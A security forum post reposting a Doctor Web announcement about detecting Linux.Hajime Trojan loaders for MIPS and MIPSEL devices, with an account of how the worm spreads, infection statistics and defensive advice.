Dr.Web was the first to detect Trojan loader for smart Linux devices with MIPS/MIPSEL architectures

Discussion in 'Dr Web' started by omidomi, Aug 27, 2017.

  1. omidomi

    omidomi Level 61
    Trusted AV Tester

    Apr 5, 2014
    Fallout New Vegas :D
    Windows 8.1
    Official Website:
    The assortment of modern malicious programs for devices that run on Linux is extremely wide. One of the most widespread Trojans for this OS is Linux.Hajime, several loaders of which are detected only by the Dr.Web Anti-virus.

    Virus analysts have been familiar with Trojans of the Linux.Hajime family since 2016. These are network worms for Linux distributed over the Telnet protocol. After obtaining a password via a brute-force attack and logging on to a device successfully, a malicious module saves a loader written in the Assembler language. Then, the malicious program connects the infected device to a decentralized P2P botnet. Linux.Hajime can infect devices with the ARM, MIPS, and MIPSEL architectures. The Trojan loaders, written in the Assembler language, are not detected by modern anti-viruses, except for the loader for ARM devices, which was described in detail by one anti-virus company in a research report.

    In addition to the loader for ARM devices, similar modules for devices with the MIPS and MIPSEL architectures have been distributed “in the wild” for over six months already. The first of them is Linux.DownLoader.506 and the second is Linux.DownLoader.356. At the moment this article was being written, only Dr.Web products were able to detect both these worms. Moreover, Doctor Web virus analysts have found that, in addition to using Trojan loaders, cybercriminals are infecting devices using standard utilities—for example, they are downloading Linux.Hajime via wget. And starting on July 11, 2017, they began downloading the Trojan to the attacked devices with the help of tftp utility.


    Statistics collected by Doctor Web specialists show that Mexico ranks first among the countries to which the IP addresses of the devices infected by Linux.Hajime belong. Turkey and Brazil are also in the top three. The geographical distribution of the infected devices’ IP addresses is shown in the diagram below:


    The following diagram shows the number of attacks carried out for the purpose of distributing Linux.Hajime in August 2017, as detected by Doctor Web.


    Doctor Web reminds users that one of the most reliable ways to prevent attacks on Linux devices is to promptly change the default login and password. It is also recommended that users place restrictions on external connections being made to their devices via the Telnet and SSH protocols and to timely update their firmware. Dr.Web for Linux detects and deletes all the aforementioned versions of Linux.Hajime loaders and allows devices to be scanned remotely.

    More about the Trojan
Similar Threads Forum Date
Hacking Alert Hancitor Trojan Downloader Evades AV Detection News Archive Feb 1, 2018
Q&A Kerish Doctor has detected Ccleaner as Trojan Threat?! General Security Discussions Oct 25, 2017
Q&A JS:Trojan.Cryxos.210 Detected - What is it? Emsisoft May 6, 2017
  • About Us

    Our community has been around since 2010, and we pride ourselves on offering unbiased, critical discussion among people of all different backgrounds about security and technology . We are working every day to make sure our community is one of the best.
  • Need Malware Removal Help?

    If you're being redirected from a site you’re trying to visit, seeing constant pop-up ads, unwanted toolbars or strange search results, your computer may be infected with malware. We offer free malware removal assistance to our members in the Malware Removal Assistance forum.
  • Quick Tip

    Without meaning to, you may click a link that installs malware on your computer. To keep your computer safe, only click links and downloads from sites that you trust. Don’t open any unknown file types, or download programs from pop-ups that appear in your browser.